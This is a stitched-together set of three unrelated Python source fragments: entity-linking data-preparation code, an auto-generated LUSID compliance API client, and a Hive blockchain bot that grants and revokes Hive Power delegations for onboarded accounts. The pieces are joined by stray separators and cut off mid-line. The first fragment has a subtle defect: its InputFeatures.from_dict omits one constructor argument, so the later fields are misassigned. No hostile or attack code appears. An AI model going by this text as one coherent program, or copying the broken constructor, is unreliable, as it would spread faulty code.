"sent_idx": self.sent_idx,
"subsent_idx": self.subsent_idx,
"alias_list_pos": self.alias_list_pos,
"alias_to_predict": self.alias_to_predict,
"span": self.span,
"phrase": self.phrase,
"alias": self.alias,
"qid": self.qid,
"qid_cnt_mask_score": self.qid_cnt_mask_score,
}
@classmethod
def from_dict(cls, in_dict):
"""Create pobject from dictionary."""
return cls(
in_dict["sent_idx"],
in_dict["subsent_idx"],
in_dict["alias_list_pos"],
in_dict["alias_to_predict"],
in_dict["span"],
in_dict["phrase"],
in_dict["alias"],
in_dict["qid"],
in_dict["qid_cnt_mask_score"],
)
class InputFeatures(object):
"""A single set of features of data."""
def __init__(
self,
alias_idx,
word_input_ids,
word_token_type_ids,
word_attention_mask,
word_qid_cnt_mask_score,
gold_eid,
for_dump_gold_eid,
gold_cand_K_idx,
for_dump_gold_cand_K_idx_train,
alias_list_pos,
sent_idx,
subsent_idx,
guid,
):
"""Initialize InputFeature."""
self.alias_idx = alias_idx
self.word_input_ids = word_input_ids
self.word_token_type_ids = word_token_type_ids
self.word_attention_mask = word_attention_mask
self.word_qid_cnt_mask_score = word_qid_cnt_mask_score
self.gold_eid = gold_eid
self.for_dump_gold_eid = for_dump_gold_eid
self.gold_cand_K_idx = gold_cand_K_idx
self.for_dump_gold_cand_K_idx_train = for_dump_gold_cand_K_idx_train
self.alias_list_pos = alias_list_pos
self.sent_idx = sent_idx
self.subsent_idx = subsent_idx
self.guid = guid
def to_dict(self):
"""Return dictionary of object."""
return {
"alias_idx": self.alias_idx,
"word_input_ids": self.word_input_ids,
"word_token_type_ids": self.word_token_type_ids,
"word_attention_mask": self.word_attention_mask,
"word_qid_cnt_mask_score": self.word_qid_cnt_mask_score,
"gold_eid": self.gold_eid,
"for_dump_gold_eid": self.for_dump_gold_eid,
"gold_cand_K_idx": self.gold_cand_K_idx,
"for_dump_gold_cand_K_idx_train": self.for_dump_gold_cand_K_idx_train,
"alias_list_pos": self.alias_list_pos,
"sent_idx": self.sent_idx,
"subsent_idx": self.subsent_idx,
"guid": self.guid,
}
@classmethod
def from_dict(cls, in_dict):
"""Create pobject from dictionary."""
return cls(
in_dict["alias_idx"],
in_dict["word_input_ids"],
in_dict["word_token_type_ids"],
in_dict["word_attention_mask"],
in_dict["word_qid_cnt_mask_score"],
in_dict["gold_eid"],
in_dict["gold_cand_K_idx"],
in_dict["for_dump_gold_cand_K_idx_train"],
in_dict["alias_list_pos"],
in_dict["sent_idx"],
in_dict["subsent_idx"],
in_dict["guid"],
)
def extract_context_windows(span, tokens, max_seq_window_len):
"""Extract the left and right context window around a span.
Args:
span: span (left and right values)
tokens: tokens
max_seq_window_len: maximum window length around a span
Returns: left context, right context
"""
# If more tokens to the right, shift weight there
if span[0] < len(tokens) - span[1]:
prev_context = tokens[max(0, span[0] - max_seq_window_len // 2) : span[0]]
next_context = tokens[
span[1] : span[1] + max_seq_window_len - len(prev_context)
]
else:
next_context = tokens[span[1] : span[1] + max_seq_window_len // 2]
prev_context = tokens[
max(0, span[0] - (max_seq_window_len - len(next_context))) : span[0]
]
return prev_context, next_context
def get_structural_entity_str(items, max_tok_len, sep_tok):
"""Return sep_tok joined list of items of strucutral resources.
Args:
items: list of structural resources
max_tok_len: maximum token length
sep_tok: token to separate out resources
Returns:
result string, number of items that went beyond ``max_tok_len``
"""
i = 1
over_len = 0
while True:
res = f" {sep_tok} " + f" {sep_tok} ".join(items[:i])
if len(res.split()) > max_tok_len or i > len(items):
if i < len(items):
over_len = 1
res = f" {sep_tok} " + f" {sep_tok} ".join(items[: max(1, i - 1)])
break
i += 1
return res, over_len
def get_entity_string(
qid,
constants,
entity_symbols,
kg_symbols,
type_symbols,
):
"""
Get string representation of entity.
For each entity, generates a string that is fed into a language model to
generate an entity embedding. Returns all tokens that are the title of the
entity (even if in the description)
Args:
qid: QID
constants: Dict of constants
entity_symbols: entity symbols
kg_symbols: kg symbols
type_symbols: type symbols
Returns: entity strings, number of types over max length, number of relations over max length
"""
over_kg_len = 0
over_type_len = 0
desc_str = (
"[ent_desc] " + entity_symbols.get_desc(qid) if constants["use_desc"] else ""
)
title_str = entity_symbols.get_title(qid) if entity_symbols.qid_exists(qid) else ""
# To encourage mention similarity, we remove the (<type>) from titles
title_str = re.sub(r"(\(.*\))", r"", title_str).strip()
# To add kgs, sep by "[ent_kg]" and then truncate to max_ent_kg_len
# Then merge with description text
if constants["use_kg"]:
# Triples stores "relation tail_qid_title" (e.g. "is member of Manchester United" for qid = <NAME>)
triples = []
for rel, tail_qids in kg_symbols.get_relations_tails_for_qid(qid).items():
for tail_q in tail_qids:
if not entity_symbols.qid_exists(tail_q):
continue
triples.append(rel + " " + entity_symbols.get_title(tail_q))
kg_str, over_len = get_structural_entity_str(
triples,
constants["max_ent_kg_len"],
"[ent_kg]",
)
over_kg_len += over_len
desc_str = " ".join([kg_str, desc_str])
# To add types, sep by "[ent_type]" and then truncate to max_type_ent_len
# Then merge with description text
if constants["use_types"]:
type_str, over_len = get_structural_entity_str(
type_symbols.get_types(qid),
constants["max_ent_type_len"],
"[ent_type]",
)
over_type_len += over_len
desc_str = " ".join([type_str, desc_str])
ent_str = " ".join([title_str, desc_str])
# Remove double spaces
ent_split = ent_str.split()
ent_str = " ".join(ent_split)
title_spans = []
if len(title_str) > 0:
# Find all occurrences of title words in the ent_str (helps if description has abbreviated name)
# Make sure you don't mask any types or kg relations
title_pieces = set(title_str.split())
to_skip = False
for e_id, ent_w in enumerate(ent_split):
if ent_w == "[ent_type]":
to_skip = True
if ent_w == "[ent_desc]":
to_skip = False
if to_skip:
continue
if ent_w in title_pieces and ent_w not in STOP_WORDS:
title_spans.append(e_id)
# all_title_occ = re.finditer(f"({title_str})", ent_str)
# all_spaces = np.array([m.start() for m in re.finditer("\s", ent_str)])
# for match in all_title_occ:
# start_w = np.sum(all_spaces < match.start())
# end_w = np.sum(all_spaces <= match.end())
# for i in range(start_w, end_w):
# title_spans.append(i)
return ent_str, title_spans, over_type_len, over_kg_len
def create_examples_initializer(constants_dict):
"""Create examples multiprocessing initializer."""
global constants_global
constants_global = constants_dict
def create_examples(
dataset,
create_ex_indir,
create_ex_outdir,
meta_file,
data_config,
dataset_threads,
use_weak_label,
split,
is_bert,
tokenizer,
):
"""Create examples from the raw input data.
Args:
dataset: data file to read
create_ex_indir: temporary directory where input files are stored
create_ex_outdir: temporary directory to store output files from method
meta_file: metadata file to save the file names/paths for the next step in prep pipeline
data_config: data config
dataset_threads: number of threads
use_weak_label: whether to use weak labeling or not
split: data split
is_bert: is the tokenizer a BERT one
tokenizer: tokenizer
"""
start = time.time()
num_processes = min(dataset_threads, int(0.8 * multiprocessing.cpu_count()))
qidcnt_file = os.path.join(
data_config.entity_dir, data_config.entity_map_dir, data_config.qid_cnt_map
)
log_rank_0_debug(logger, "Counting lines")
total_input = sum(1 for _ in open(dataset))
constants_dict = {
"is_bert": is_bert,
"use_weak_label": use_weak_label,
"split": split,
"qidcnt_file": qidcnt_file,
"max_seq_len": data_config.max_seq_len,
"max_seq_window_len": data_config.max_seq_window_len,
}
if num_processes == 1:
out_file_name = os.path.join(create_ex_outdir, os.path.basename(dataset))
res = create_examples_single(
in_file_idx=0,
in_file_name=dataset,
in_file_lines=total_input,
out_file_name=out_file_name,
constants_dict=constants_dict,
)
files_and_counts = {}
total_output = res["total_lines"]
files_and_counts[res["output_filename"]] = res["total_lines"]
else:
log_rank_0_info(
logger, f"Starting to extract examples using {num_processes} processes"
)
chunk_input = int(np.ceil(total_input / num_processes))
log_rank_0_debug(
logger,
f"Chunking up {total_input} lines into subfiles of size {chunk_input} lines",
)
total_input_from_chunks, input_files_dict = utils.chunk_file(
dataset, create_ex_indir, chunk_input
)
input_files = list(input_files_dict.keys())
input_file_lines = [input_files_dict[k] for k in input_files]
output_files = [
in_file_name.replace(create_ex_indir, create_ex_outdir)
for in_file_name in input_files
]
assert (
total_input == total_input_from_chunks
), f"Lengths of files {total_input} doesn't mathc {total_input_from_chunks}"
log_rank_0_debug(logger, "Done chunking files. Starting pool.")
pool = multiprocessing.Pool(
processes=num_processes,
initializer=create_examples_initializer,
initargs=[
constants_dict,
],
)
total_output = 0
input_args = list(
zip(
list(range(len(input_files))),
input_files,
input_file_lines,
output_files,
)
)
# Store output files and counts for saving in next step
files_and_counts = {}
for res in pool.imap_unordered(create_examples_hlp, input_args, chunksize=1):
total_output += res["total_lines"]
files_and_counts[res["output_filename"]] = res["total_lines"]
pool.close()
utils.dump_json_file(
meta_file, {"num_mentions": total_output, "files_and_counts": files_and_counts}
)
log_rank_0_debug(
logger,
f"Done with extracting examples in {time.time() - start}. "
f"Total lines seen {total_input}. Total lines kept {total_output}.",
)
return
def create_examples_hlp(args):
"""Create examples multiprocessing helper."""
in_file_idx, in_file_name, in_file_lines, out_file_name = args
return create_examples_single(
in_file_idx,
in_file_name,
in_file_lines,
out_file_name,
constants_global,
)
def create_examples_single(
in_file_idx,
in_file_name,
in_file_lines,
out_file_name,
constants_dict,
):
"""Create examples."""
split = constants_dict["split"]
max_seq_window_len = constants_dict["max_seq_window_len"]
use_weak_label = constants_dict["use_weak_label"]
qidcnt_file = constants_dict["qidcnt_file"]
qid2cnt = {}
quantile_buckets = [float(i / 100) for i in list(range(0, 101, 5))]
# If not qid2cnt, the quantile_bucket will be 100
quants = np.array([-1 for _ in quantile_buckets])
quants[-1] = 0
if os.path.exists(qidcnt_file):
qid2cnt = ujson.load(open(qidcnt_file))
quants = np.quantile(list(qid2cnt.values()), quantile_buckets)
with open(out_file_name, "w", encoding="utf-8") as out_f:
total_subsents = 0
total_lines = | |
_preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ComplianceRun, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'is_pre_trade',
'recipe_id_scope',
'recipe_id_code',
'by_taxlots'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method run_compliance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'is_pre_trade' is set
if self.api_client.client_side_validation and ('is_pre_trade' not in local_var_params or # noqa: E501
local_var_params['is_pre_trade'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `is_pre_trade` when calling `run_compliance`") # noqa: E501
# verify the required parameter 'recipe_id_scope' is set
if self.api_client.client_side_validation and ('recipe_id_scope' not in local_var_params or # noqa: E501
local_var_params['recipe_id_scope'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `recipe_id_scope` when calling `run_compliance`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_scope' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_scope']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_scope' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_scope']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'recipe_id_scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['recipe_id_scope']): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_scope` when calling `run_compliance`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_code' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_code']) > 64): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, length must be less than or equal to `64`") # noqa: E501
if self.api_client.client_side_validation and ('recipe_id_code' in local_var_params and # noqa: E501
len(local_var_params['recipe_id_code']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'recipe_id_code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['recipe_id_code']): # noqa: E501
raise ApiValueError("Invalid value for parameter `recipe_id_code` when calling `run_compliance`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_pre_trade' in local_var_params and local_var_params['is_pre_trade'] is not None: # noqa: E501
query_params.append(('isPreTrade', local_var_params['is_pre_trade'])) # noqa: E501
if 'recipe_id_scope' in local_var_params and local_var_params['recipe_id_scope'] is not None: # noqa: E501
query_params.append(('recipeIdScope', local_var_params['recipe_id_scope'])) # noqa: E501
if 'recipe_id_code' in local_var_params and local_var_params['recipe_id_code'] is not None: # noqa: E501
query_params.append(('recipeIdCode', local_var_params['recipe_id_code'])) # noqa: E501
if 'by_taxlots' in local_var_params and local_var_params['by_taxlots'] is not None: # noqa: E501
query_params.append(('byTaxlots', local_var_params['by_taxlots'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ComplianceRun",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/compliance/runs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def run_compliance_check(self, file_name, **kwargs): # noqa: E501
"""[EXPERIMENTAL] RunComplianceCheck: Kick off the compliance check process -- DEPRECATING - POST TRADE ONLY # noqa: E501
Use this endpoint to fetch the start a compliance run, based on a pre-set mapping file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.run_compliance_check(file_name, async_req=True)
>>> result = thread.get()
:param file_name: The name of compliance mappings file to use. Has to exist in drive ComplianceRules folder (required)
:type file_name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ComplianceRun
"""
kwargs['_return_http_data_only'] = True
return self.run_compliance_check_with_http_info(file_name, **kwargs) # noqa: E501
def run_compliance_check_with_http_info(self, file_name, **kwargs): # noqa: E501
"""[EXPERIMENTAL] RunComplianceCheck: Kick off the compliance check process -- DEPRECATING - POST TRADE ONLY # noqa: E501
Use this endpoint to fetch the start a compliance run, based on a pre-set mapping file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.run_compliance_check_with_http_info(file_name, async_req=True)
>>> result = thread.get()
:param file_name: The name of compliance mappings file to use. Has to exist in drive ComplianceRules folder (required)
:type file_name: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ComplianceRun, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'file_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method run_compliance_check" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'file_name' is set
if self.api_client.client_side_validation and ('file_name' not in local_var_params or # noqa: E501
local_var_params['file_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `file_name` when calling `run_compliance_check`") # noqa: E501
if self.api_client.client_side_validation and ('file_name' in local_var_params and # noqa: E501
len(local_var_params['file_name']) > 50): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, length must be less than or equal to `50`") # noqa: E501
if self.api_client.client_side_validation and ('file_name' in local_var_params and # noqa: E501
len(local_var_params['file_name']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'file_name' in local_var_params and not re.search(r'^[A-Za-z0-9_\-\.]+[A-Za-z0-9_\-\. ]*$', local_var_params['file_name']): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, must conform to the pattern `/^[A-Za-z0-9_\-\.]+[A-Za-z0-9_\-\. ]*$/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'file_name' in local_var_params and local_var_params['file_name'] is not None: # noqa: E501
query_params.append(('fileName', local_var_params['file_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ComplianceRun",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/compliance/run', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def upsert_compliance_rules(self, request_body, **kwargs): # noqa: E501
"""[EXPERIMENTAL] UpsertComplianceRules: Upsert compliance rules. # noqa: E501
To upsert a new rule, the code field must be left empty, a code will then be assigned and returned as part of the response. | |
<reponame>holgern/delegationOnboardBot
#!/usr/bin/python
from beem import Hive
from beem.comment import Comment
from beem.account import Account
from beem.amount import Amount
from beem.blockchain import Blockchain
from beem.nodelist import NodeList
from beem.exceptions import ContentDoesNotExistsException
from beem.utils import addTzInfo, resolve_authorperm, construct_authorperm, derive_permlink, formatTimeString
from datetime import datetime, timedelta, date
from beem.rc import RC
import time
import shelve
from prettytable import PrettyTable
import json
import logging
import logging.config
import argparse
import os
import sys
from delegationonboardbot.utils import print_block_log, check_config, store_data, read_data
import requests
logger = logging.getLogger(__name__)
def setup_logging(
default_path='logging.json',
default_level=logging.INFO
):
"""Setup logging configuration
"""
path = default_path
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logger.setLevel(default_level)
logging.basicConfig()
class DelegationOnboardBot:
def __init__(self, config, data_file, hived_instance):
self.config = config
self.data_file = data_file
data_db = read_data(data_file)
if "accounts" in data_db:
accounts = data_db["accounts"]
else:
accounts = {}
self.hive = hived_instance
# add log stats
self.log_data = {"start_time": 0, "last_block_num": None, "new_commands": 0, "stop_block_num": 0,
"stop_block_num": 0, "time_for_blocks": 0}
config_cnt = 0
necessary_fields = ["delegationAccount", "referrerAccount", "adminAccount", "delegationAmount", "delegationLength",
"beneficiaryRemoval", "minPostRC", "muteAccount", "hpWarning", "maxUserHP",
"notifyUser", "delegationMsg", "delegationLengthMsg",
"delegationMuteMsg", "delegationBeneficiaryMsg",
"delegationMaxMsg"]
check_config(self.config, necessary_fields, self.hive)
self.hive.wallet.unlock(self.config["wallet_password"])
self.onboard_api = "https://hiveonboard.com/api/referrer/%s" % self.config["referrerAccount"]
self.blockchain = Blockchain(mode='head', blockchain_instance=self.hive)
self.muted_acc = Account(self.config["muteAccount"], blockchain_instance=self.hive)
self.delegation_acc = Account(self.config["delegationAccount"], blockchain_instance=self.hive)
self.muted_accounts = self.muted_acc.get_mutings(limit=1000)
active_key = False
for key in self.delegation_acc["active"]["key_auths"]:
if key[0] in self.hive.wallet.getPublicKeys(current=True):
active_key = True
for key in self.delegation_acc["owner"]["key_auths"]:
if key[0] in self.hive.wallet.getPublicKeys(current=True):
active_key = True
if not active_key:
logger.warn("Active key from %s is not stored into the beempy wallet." % self.delegation_acc["name"])
rc = RC(blockchain_instance=self.hive)
self.comment_rc_costs = rc.comment(tx_size=4000, permlink_length=40, parent_permlink_length=0)
self.accounts = self.get_referrer(accounts)
self.update_delegations()
self.check_muted(self.muted_accounts)
self.check_delegation_age()
self.check_max_hp()
self.print_account_info()
store_data(self.data_file, "accounts", self.accounts)
def print_account_info(self):
revoked = 0
delegated = 0
delegated_hp = 0
for acc in self.accounts:
if self.accounts[acc]["delegated_hp"] > 0:
delegated += 1
delegated_hp += self.accounts[acc]["delegated_hp"]
if self.accounts[acc]["delegation_revoked"] > 0:
revoked += 1
logger.info("%d accounts have been created with referrer %s" % (len(self.accounts), self.config["referrerAccount"]))
logger.info("%d accounts have received a delegation (%.3f HP)" % (delegated, delegated_hp))
logger.info("%d accounts have been revoked" % revoked)
def get_referrer(self, accounts):
limit = 20
offset = 0
last_result = []
cnt = 0
result = []
while last_result is not None and len(last_result) == limit or cnt == 0:
cnt += 1
r = requests.get(self.onboard_api + '?offset=%d' % (offset))
if r.ok:
last_result = r.json()["items"]
if last_result is not None and len(last_result) > 0:
result += last_result
offset += limit
for r in result:
if r["account"] in accounts:
continue
accounts[r["account"]] = {"timestamp": None, "weight": None, "muted": False, "rc": 0, "hp": 0,
"delegated_hp": 0, "delegation_timestamp": None, "rc_comments": 0,
"delegation_revoked": False}
accounts[r["account"]]["timestamp"] = datetime.utcfromtimestamp(float(r["timestamp"]) / 1000.0)
accounts[r["account"]]["weight"] = r["weight"]
return accounts
def update_delegations(self):
delegations = self.delegation_acc.get_vesting_delegations(start_account='', limit=1000, account=None)
for d in delegations:
if d["delegatee"] in self.accounts:
self.accounts[d["delegatee"]]["delegated_hp"] = self.hive.vests_to_hp(float(Amount(d["vesting_shares"], blockchain_instance=self.hive)))
self.accounts[d["delegatee"]]["delegation_timestamp"] = formatTimeString(d["min_delegation_time"]).replace(tzinfo=None)
def check_max_hp(self):
if self.config["maxUserHP"] <= 0:
return
for account in self.accounts:
if self.accounts[account]["delegated_hp"] == 0:
continue
if self.accounts[account]["delegation_revoked"]:
continue
if self.accounts[account]["hp"] > self.config["maxUserHP"]:
self.remove_delegation(account)
self.notify_account(account, self.config["delegationMaxMsg"])
def check_delegation_age(self):
if self.config["delegationLength"] <= 0:
return
for account in self.accounts:
if self.accounts[account]["delegated_hp"] == 0:
continue
if self.accounts[account]["delegation_revoked"]:
continue
if (datetime.utcnow() - self.accounts[account]["delegation_timestamp"]).total_seconds() / 60 / 60 / 24 > self.config["delegationLength"]:
self.remove_delegation(account)
self.notify_account(account, self.config["delegationLengthMsg"])
def check_muted(self, muted_accounts):
for acc in muted_accounts:
if acc not in self.accounts:
continue
if not self.accounts[acc]["muted"]:
self.accounts[acc]["muted"] = True
store_data(self.data_file, "accounts", self.accounts)
if self.accounts[acc]["delegated_hp"] > 0 and not self.accounts[acc]["delegation_revoked"]:
self.remove_delegation(acc)
self.notify_account(acc, self.config["delegationMuteMsg"])
def notify_admin(self, msg):
if self.config["no_broadcast"]:
logger.info("no_broadcast=True, Would send to %s the following message: %s" % (self.config["adminAccount"], msg))
return
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("Send to %s the following message: %s" % (self.config["adminAccount"], msg))
self.delegation_acc.transfer(self.config["adminAccount"], 0.001, "HIVE", memo=msg)
def notify_account(self, account, msg):
if not self.config["notifyUser"]:
return
if self.config["no_broadcast"]:
logger.info("no_broadcast=True, Would send to %s the following message: %s" % (account, msg))
return
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("Send to %s the following message: %s" % (account, msg))
self.delegation_acc.transfer(account, 0.001, "HIVE", memo=msg)
def check_account_on_activity(self, account, timestamp):
if account not in self.accounts:
return
acc = Account(account, blockchain_instance=self.hive)
self.accounts[account]["rc"] = acc.get_rc_manabar()["current_mana"]
self.accounts[account]["hp"] = acc.get_token_power(only_own_vests=True)
self.accounts[account]["rc_comments"] = self.accounts[account]["rc"] / self.comment_rc_costs
store_data(self.data_file, "accounts", self.accounts)
if self.accounts[account]["delegated_hp"] > 0:
return
if self.accounts[account]["delegation_revoked"]:
return
if self.accounts[account]["hp"] > self.config["maxUserHP"]:
return
if self.accounts[account]["rc_comments"] < self.config["minPostRC"]:
ok = self.add_delegation(account, timestamp)
if ok:
self.notify_account(account, self.config["delegationMsg"])
def check_beneficiaries(self, author, permlink):
if author not in self.accounts:
return
if self.accounts[author]["delegated_hp"] == 0:
return
if self.accounts[author]["delegation_revoked"]:
return
if not self.config["beneficiaryRemoval"]:
return
comment = None
cnt = 0
while comment is None and cnt < 10:
cnt += 1
try:
comment = Comment(construct_authorperm(author, permlink), blockchain_instance=self.hive)
except:
comment = None
time.sleep(3)
referrer_ok = False
for bene in comment["beneficiaries"]:
if bene["account"] == self.config["referrerAccount"] and bene["weight"] == self.accounts[author]["weight"]:
referrer_ok = True
if not referrer_ok:
self.remove_delegation(author)
self.notify_account(author, self.config["delegationBeneficiaryMsg"])
def check_for_sufficient_hp(self):
data_db = read_data(self.data_file)
if "hp_warning_send" in data_db:
hp_warning_send = data_db["hp_warning_send"]
else:
hp_warning_send = False
hp = self.delegation_acc.get_token_power(only_own_vests=True)
if hp_warning_send and hp > self.config["hpWarning"]:
hp_warning_send = False
elif not hp_warning_send and hp < self.config["hpWarning"]:
if not self.config["no_broadcast"]:
hp_warning_send = True
self.notify_admin("Warning: HIVE POWER of @%s is below %.3f HP" % (self.config["delegationAccount"], self.config["hpWarning"]))
store_data(self.data_file, "hp_warning_send", hp_warning_send)
def remove_delegation(self, account):
if self.config["no_broadcast"]:
logger.info("no_broadcast = True, Would remove delegation from %s" % (account))
return False
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("remove delegation from %s" % (account))
try:
self.delegation_acc.delegate_vesting_shares(account, 0)
except Exception as e:
logger.warn(str(e))
self.notify_admin("Could not undelegate HP from %s" % (account))
return False
self.accounts[account]["delegation_revoked"] = True
store_data(self.data_file, "accounts", self.accounts)
return True
def add_delegation(self, account, timestamp):
if self.config["no_broadcast"]:
logger.info("no_broadcast = True, Would add delegation of %.2f HP to %s" % (self.config["delegationAmount"], account))
return False
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("add delegation of %.2f HP to %s" % (self.config["delegationAmount"], account))
try:
self.delegation_acc.delegate_vesting_shares(account, self.hive.hp_to_vests(self.config["delegationAmount"]))
except Exception as e:
logger.warn(str(e))
self.notify_admin("Could not delegate %.2f HP to %s" % (self.config["delegationAmount"], account))
return False
self.accounts[account]["delegated_hp"] = self.config["delegationAmount"]
self.accounts[account]["delegation_timestamp"] = timestamp
self.accounts[account]["delegation_revoked"] = False
store_data(self.data_file, "accounts", self.accounts)
return True
def run(self, start_block, stop_block):
if self.hive.wallet.locked():
self.hive.wallet.unlock(self.config["wallet_password"])
if self.hive.wallet.locked():
logger.error("Could not unlock wallet. Please check wallet_passowrd in config")
return
current_block = self.blockchain.get_current_block_num()
if stop_block is None or stop_block > current_block:
stop_block = current_block
if start_block is None:
start_block = current_block
last_block_num = current_block - 1
else:
last_block_num = start_block - 1
self.check_delegation_age()
self.check_max_hp()
self.check_for_sufficient_hp()
store_data(self.data_file, "accounts", self.accounts)
self.log_data["start_block_num"] = start_block
for op in self.blockchain.stream(start=start_block, stop=stop_block):
self.log_data = print_block_log(self.log_data, op, self.config["print_log_at_block"])
last_block_num = op["block_num"]
timestamp = op["timestamp"].replace(tzinfo=None)
if op["type"] == "comment":
account = op["author"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
if op["parent_author"] == "":
self.check_beneficiaries(op["author"], op["permlink"])
elif op["type"] == "vote":
account = op["voter"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "transfer":
account = op["from"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "custom_json":
if len(op["required_posting_auths"]) > 0:
account = op["required_posting_auths"][0]
elif len(op["required_auths"]) > 0:
account = op["required_auths"][0]
if op["id"] == "follow":
if op["json"] == "":
continue
json_data = json.loads(op["json"])
if "what" not in json_data:
continue
if len(json_data["what"]) == 0:
continue
if json_data["what"][0] != "ignore":
